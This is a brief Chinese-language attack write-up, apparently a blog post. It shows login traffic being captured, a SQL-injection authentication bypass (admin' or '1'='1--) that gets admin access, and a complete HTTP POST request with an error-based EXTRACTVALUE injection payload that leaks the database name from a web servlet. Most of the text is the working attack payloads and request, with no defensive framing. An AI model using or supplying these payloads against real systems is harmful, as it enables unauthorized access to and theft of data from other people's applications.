登陆点抓包
发现sql语句都直接有,尝试万用密码
admin' or '1'='1--q
1
登录成功
但是没有什么功能点但可以报错注入
POST /v1/mysqlServlet/mongoSql?random=0.6745034416624898 HTTP/1.1
Host:
Connection: keep-alive
Content-Length: 148
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: application/json, text/plain, /
sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
Origin:
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
PF=simulationDataResources&sqlfile=simulationTrain%2Flogin_check.json&userId=&userName=admin' AND (SELECT 1 FROM (SELECT EXTRACTVALUE(1, CONCAT(0x5c, (SELECT DATABASE())))) y) AND '1'='1&conditions%5BPASSWD%5D=c4ca4238a0b923820dcc509a6f75849b
报错爆出来数据库名
评论0
暂时没有评论